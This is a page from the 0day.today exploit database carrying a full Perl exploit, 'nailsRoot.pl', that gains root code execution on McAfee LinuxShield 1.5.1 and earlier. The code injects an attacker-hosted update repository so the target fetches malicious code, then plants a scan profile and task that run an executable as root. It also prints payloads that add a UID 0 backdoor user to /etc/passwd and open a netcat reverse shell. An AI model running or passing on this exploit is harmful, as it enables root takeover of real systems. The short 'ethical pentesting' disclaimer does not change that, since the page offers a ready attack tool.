0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
McAfee LinuxShield <= 1.5.1 Local/Remote Root Code Execution
[============================================================
McAfee LinuxShield <= 1.5.1 Local/Remote Root Code Execution
============================================================
#!/usr/bin/perl
##
# Title: McAfee LinuxShield <= 1.5.1 Local/Remote Root Exploit
# Name: nailsRoot.pl
# Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
# WARNING: This Exploit deletes the default Update Server
#
# Use it only for education or ethical pentesting! The author accepts
# no liability for damage caused by this tool.
#
##
use strict;
use IO::Socket::SSL;
use Getopt::Std;
my %args;
my $ack;
my $timestamp;
getopt('h:p:u:v:e:a:g:', \%args);
my $gen_exec = $args{g};
if (defined $gen_exec) {
genEx($gen_exec);
}
my $target_host = $args{h} || usage();
my $target_port = $args{p} || 65443;
my $nails_user = $args{u} || usage();
my $nails_pass = $args{v} || "";
my $exec_path = $args{e} || "/opt/McAfee/cma/scratch/update/catalog.z";
my $my_host = $args{a} || "";
my $range = 50000000;
my $minimum = 90000000;
my $randomtask = int(rand($range)) + $minimum;
my $pre="sconf ODS_99 ";
my $post="\x0d\x0a";
my $setrepo1='db set 1 _table=repository status=1 siteList=<?xml\ version="1.0"\ encoding="UTF-8"?><ns:SiteLis'.
'ts\ xmlns:ns="naSiteList"\ GlobalVersion="20030131003110"\ LocalVersion="20091209161903"\ Type="Clie'.
'nt"><SiteList\ Default="1"\ Name="SomeGUID"><HttpSite\ Type="repository"\ Name="EvilRepo"\ Order="1"'.
'\ Server="';
my $setrepo2=':80"\ Enabled="1"\ Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAut'.
'h><UserName></UserName><Password\ Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update';
my $setsite="task setsitelist";
my $begin="begin";
my$set="set ";
my $profile=" nailsd.profile.ODS_99.allFiles=true nailsd.profile.ODS_99.childInitTmo=60".
" nailsd.profile.ODS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=10000 nailsd.profile.ODS".
"_5.datPath=/opt/NAI/LinuxShield/engine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.profile.".
"ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib nailsd.prof".
"ile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so".
" nailsd.profile.ODS_99.factoryInitT".
"mo=60 nailsd.profile.ODS_99.heuristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=true nailsd.p".
"rofile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false nails".
"d.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1 nailsd.profile.ODS_99.quaran".
"tineDirectory=/quarantine nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scan".
"Children=2 nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profil".
"e.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true nailsd.profile.ODS_99.scannerPath=".
"$exec_path".
" nailsd.profile.ODS_99.scansPerChild=10000 nailsd.profile.ODS_99.sl".
"owScanChildren=0 nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.pat".
"h=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all ".
"nailsd.profile.ODS_99.filter.extensions.type=extension nailsd.profile.ODS_99.action.Default.primary=".
"Clean nailsd.profile.ODS_99.action.Default.secondary=Quarantine nailsd.profile.ODS_99.action.App.pri".
"mary=Clean nailsd.profile.ODS_99.action.App.secondary=Quarantine nailsd.profile.ODS_99.action.timeou".
"t=Pass nailsd.profile.ODS_99.action.error=Block";
my $commit="commit ";
my $setdb=" _table=schedule taskName=$randomtask taskType=On-Demand taskInfo=profileName=ODS_99,".
"paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 i_lastRun=1260318482 status=Stopped _cmd=insert";
#update _where= i_taskId=2";
my $execupd="task nstart LinuxShield Update";
my $execute="task nstart $randomtask";
banner();
if ($exec_path eq "/opt/McAfee/cma/scratch/update/catalog.z") {
if ($my_host eq "") {
usage();
}
stOne();
}else{
stTwo();
}
sub stOne {
my $reposock = IO::Socket::SSL->new(
PeerAddr => $target_host,
PeerPort => $target_port,
Proto => 'tcp',
);
if (defined $reposock) {
print "[*] Executing Stage One\n";
print "-----------------------\n";
$ack=<$reposock>;
print $ack;
print $reposock "auth ".$nails_user." ".$nails_pass.$post;
$ack=<$reposock>;
if ($ack=~m/ERR authentication failure/){
print "[-] Authentication failed...\n";
exit(1);
}
print $ack;
sleep(1);
print "[+] Repo update: inject evil repo\n";
print $reposock $setrepo1.$my_host.$setrepo2.$post;
sleep(1);
print "[+] Repo Site update: update site task\n";
print $reposock $setsite.$post;
$ack=<$reposock>;
print $ack;
sleep(1);
print "[+] Execute AV Update: downloading evil code\n";
print $reposock $execupd.$post;
sleep(5); # Update needs a bit time
$reposock->shutdown(1);
}
stTwo();
}
sub stTwo {
my $sock = IO::Socket::SSL->new(
PeerAddr => $target_host,
PeerPort => $target_port,
Proto => 'tcp',
);
if (defined $sock) {
print "\n\n[*] Executing Stage TWO\n";
print "-----------------------\n";
$ack=<$sock>;
print $ack;
print $sock "auth ".$nails_user." ".$nails_pass.$post;
$ack=<$sock>;
if ($ack=~m/ERR authentication failure/){
print "[-] Authentication failed...\n";
exit(1);
}
print $ack;
sleep(1);
print $sock $pre.$begin.$post;
$ack=<$sock>;
print $ack;
$ack=~s/\+OK //g;
$timestamp=$ack;
$timestamp=~ s/\s+$//;
print "[+] Timestamp: $timestamp\n";
print "[+] Profile: Injecting evil Profile\n";
print $sock $pre.$set.$timestamp.$profile.$post;
sleep(1);
print "[+] Commit: Profile changes\n";
print $sock $pre.$commit.$timestamp.$post;
sleep(1);
print "[+] Schedule: Injecting evil task $randomtask\n";
print $sock "db set ".$timestamp.$setdb.$post;
sleep(1);
print "[+] Excute: Task $randomtask\n";
print $sock $execute.$post;
$sock->shutdown(1);
print "[+] Done... Check whatever you did\n";
} else {
print "[-] some troubles with connection: $!\n" ;
}
}
sub usage {
print "\n";
print " nailsRoot.pl - McAfee LinuxShield local/remote Root Exploit\n";
print "===============================================================\n\n";
print " Usage:\n";
print " $0 -h <target ip> -u <user> -v <pass> [-a <my host>|-e <executable>]\n";
print " Optional:\n";
print " -a <attacker host with httpd>\n";
print " -e <executable file on target host>\n";
print " -p <target port (default: 65443)>\n";
print " -g (1|2) <generat shell scripts to execute>\n";
print " 1 <UID 0 user add>\n";
print " 2 <reverse nc shell>\n";
print " Notes:\n";
print " -We can not handle arguments given to executable\n";
print " in the -e option.\n";
print " -To download your own evil executable, start a httpd\n";
print " and set the -a option. Create the directory <nai> in\n";
print " your wwwroot and rename your executable to <catalog.z>\n";
print " Author:\n";
print " Nikolas Sotiriu (lofi)\n";
print " url: www.sotiriu.de\n";
print " mail: lofi[at]sotiriu.de\n";
print "\n";
exit(1);
}
sub genEx {
my ($code)=@_;
if ($code==1) {
print STDERR << "EOF";
============== UID 0 user add ==============
Copy this lines to the catalog.z file.
USER=haxxor PASS=haxxorPass
-------------- cut --------------
#!/bin/sh
echo haxxor:AzFQk89Xgpp8s:0:0::/:/bin/sh >> /etc/passwd
-------------- /cut --------------
EOF
} elsif ($code==2) {
print STDERR << "EOF";
============== reverse nc shell ==============
Copy this lines to the catalog.z file.
-------------- cut --------------
#!/bin/sh
nc -nv <yourip> 4444 -e /bin/sh
-------------- /cut --------------
EOF
}
exit(1);
}
sub banner {
print STDERR << "EOF";
--------------------------------------------------------------------------------
nailsRoot.pl - McAfee LinuxShield local/remote Root Exploit
--------------------------------------------------------------------------------
111 1111111
11100 101 00110111001111
11101 11 10 111 101 1001111111
1101 11 00 10 11 11 111 1111111101
10111 1 10 11 10 0 10 1 1 1 1111111011
1111 1 1 10 0 01 01 01 1 1 111 1111011101
1000 0 11 10 10 0 10 11 111 11111 11 1111 111100
1111111111 01 10 10 11 01 0 11 11111111111 1 1111 11
10111110 0 01 00 11 1110 11 10 11111111111 11 11111 11 111
101111111 0 10 01 11 1 11 0 10 11 1111111111111111 1111110000111
011111 0110 10 10 0 11 1 11 01 01 111111111111111 1 11110011001
1011111 0110 10 11 1110 11 1 10 11111111111111111111 1 100 001
1011111 0 10 10 01 1 0 1 11 1 111111111111111111111111 001101
011111 0 0 0 11 0 1111 0 11 01111111111111111111111111 01
1111111 01 01 111 1 1111 1 11 1111111111111111111111 1101 1111
111 1111 10 0 111110 0111 0 1 0111111111111111111111 11111 1111
111 11111 1 11 1 1 1 111 11 11111111111111111111111110 1001
111 1011111 1 11111111110111111111111111111111111111111 01 10111001
11 1100 10110110 10001 11101111111111111111 10 111 11100
111 00 1011101 00101 0 11111111111111111001 11 111101
11 00 00 101 1000011 1011 1111 1111111000 1111111 0
11 00 0 1011 100001 101000 1 1001 00001111 01
01101 11111 1011 01100 0101 110 11 10
10111 1 0 01 0000011 10 10
10011 11100 1111 101 11
1110 01 101011 1001100
1111000011 1 111
11000001111
1
EOF
}
# 0day.today [2024-11-15] #